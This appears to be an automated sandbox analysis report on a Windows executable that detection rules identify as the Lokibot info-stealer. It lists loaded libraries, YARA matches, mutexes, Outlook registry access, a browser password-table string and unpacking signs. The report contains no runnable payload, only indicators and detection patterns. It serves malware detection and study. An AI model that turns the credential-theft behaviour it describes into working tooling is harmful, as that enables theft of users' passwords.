Source: XZoxEqlRUw.exe, 00000000.00000002.1615411943.0000000000437000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUnemptied.exe vs XZoxEqlRUw.exe
Source: XZoxEqlRUw.exe, 00000001.00000000.1615195207.0000000000437000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUnemptied.exe vs XZoxEqlRUw.exe
Source: XZoxEqlRUw.exe	Binary or memory string: OriginalFilenameUnemptied.exe vs XZoxEqlRUw.exe

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: XZoxEqlRUw.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: XZoxEqlRUw.exe PID: 7604, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: XZoxEqlRUw.exe PID: 7628, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: XZoxEqlRUw.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@0/1

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Code function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

1_2_0040650A

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Code function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

1_2_0040434D

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Mutant created: NULL

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: XZoxEqlRUw.exe, 00000001.00000003.1615993357.0000000000665000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: XZoxEqlRUw.exe

ReversingLabs: Detection: 95%

Source: unknown	Process created: C:\Users\user\Desktop\XZoxEqlRUw.exe "C:\Users\user\Desktop\XZoxEqlRUw.exe"
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process created: C:\Users\user\Desktop\XZoxEqlRUw.exe "C:\Users\user\Desktop\XZoxEqlRUw.exe"
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process created: C:\Users\user\Desktop\XZoxEqlRUw.exe "C:\Users\user\Desktop\XZoxEqlRUw.exe"	Jump to behavior

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Unpacked PE file: 1.2.XZoxEqlRUw.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.htext:EW; vs .text:ER;.rdata:R;.data:W;.x:W;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Unpacked PE file: 1.2.XZoxEqlRUw.exe.400000.0.unpack

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XZoxEqlRUw.exe PID: 7604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XZoxEqlRUw.exe PID: 7628, type: MEMORYSTR

Source: XZoxEqlRUw.exe

Static PE information: real checksum: 0x3f40f should be: 0x42673

Source: XZoxEqlRUw.exe

Static PE information: section name: .htext

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_00406C6A push edx; rep ret	0_2_00406C6C
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_00405808 push ebx; iretd	0_2_004057DB
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_0040660A pushfd ; retf	0_2_0040660B
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_004036C9 push esi; ret	0_2_004036CC
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_004068FF push F53B5A61h; ret	0_2_004068A5
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_0040688E push F53B5A61h; ret	0_2_004068A5
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_00405D46 push ss; ret	0_2_00405D51
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_00402D63 push esp; ret	0_2_00402D79
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_00405F00 pushfd ; ret	0_2_00405F04
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_00404119 push edi; iretd	0_2_00404124
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_00404FD7 push ecx; retf	0_2_00404FD9
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_0040579F push ebx; iretd	0_2_004057DB
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_00403BB0 push ds; ret	0_2_00403BC3
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AD4
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AFC

Source: XZoxEqlRUw.exe

Static PE information: section name: .text entropy: 7.45421010060428

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
